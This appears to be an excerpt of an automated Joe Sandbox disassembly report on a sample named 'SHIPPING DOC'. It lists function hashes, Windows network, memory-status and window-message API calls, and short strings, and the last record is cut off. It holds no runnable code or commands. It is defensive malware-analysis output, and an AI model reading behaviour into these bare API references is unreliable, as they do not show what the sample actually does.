                                                                                                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                      • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3035604524-1350329615
                                                                                                                      • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                      • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \$h
                                                                                                                      • API String ID: 4104443479-677774858
                                                                                                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID: &
                                                                                                                      • API String ID: 2931989736-1010288
                                                                                                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 4104443479-2967466578
                                                                                                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00466825
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 596671847-2343686810
                                                                                                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                      APIs
                                                                                                                      • _strlen.LIBCMT ref: 0040F858
                                                                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                      • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_sprintf_strlen
                                                                                                                      • String ID: %02X
                                                                                                                      • API String ID: 1921645428-436463671
                                                                                                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: htonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InternetOpen
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 2038078732-4266983199
                                                                                                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: u,D
                                                                                                                      • API String ID: 4104443479-3858472334
                                                                                                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • wsprintfW.USER32 ref: 0045612A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_mallocwsprintf
                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                      • API String ID: 1262938277-328681919
                                                                                                                      • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                                                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                      • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
